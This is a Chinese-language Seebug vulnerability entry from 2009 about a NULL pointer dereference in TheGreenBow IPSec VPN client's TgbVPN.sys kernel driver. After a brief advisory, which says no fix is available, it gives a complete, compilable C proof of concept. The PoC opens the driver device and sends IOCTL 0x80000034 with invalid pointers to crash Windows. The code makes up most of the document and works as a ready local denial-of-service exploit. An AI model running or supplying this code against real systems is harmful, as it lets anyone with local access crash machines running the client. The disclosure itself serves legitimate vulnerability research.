TheGreenBow IPSec VPN客户端TgbVPN.sys拒绝服务漏洞

2009-08-24T00:00:00
ID SSV:12095
Type seebug
Reporter Root
Modified 2009-08-24T00:00:00

Description

TheGreenBow IPSec VPN Client是一款流行的VPN客户端。 TheGreenBow IPSec VPN客户端TgbVPN.sys内核驱动处理IOCTLs时存在NULL指针引用错误,本地攻击者可以利用漏洞发送0x80000034 IOCTL使系统崩溃。

TheGreenBow IPSec VPN Client 4.x 目前没有详细解决方案提供: http://www.thegreenbow.com/vpn.html

                                        
                                            
                                                +--------------------------------------------------------------------------------------------+
/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 * http://evilcodecave.blogspot.com
 * http://evilcodecave.wordpress.com
 * http://evilfingers.com
 * http://malwareAnalytics.com [under construction]
 */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
   HANDLE hDevice;
   DWORD Junk;
   system("cls");
   printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");
   hDevice = CreateFileA("\\\\.\\tgbvpn",
                       0,
                       FILE_SHARE_READ | FILE_SHARE_WRITE,
                       NULL,
                       OPEN_EXISTING,
                       0,
                       NULL);
   if (hDevice == INVALID_HANDLE_VALUE)
   {
       printf("\n Unable to Device Driver\n");
       return EXIT_FAILURE;
   }
   DeviceIoControl(hDevice, 0x80000034,(LPVOID) 0x80000001, 0, (LPVOID)
0x80000002, 0, &Junk, (LPOVERLAPPED)NULL);
   return EXIT_SUCCESS;
}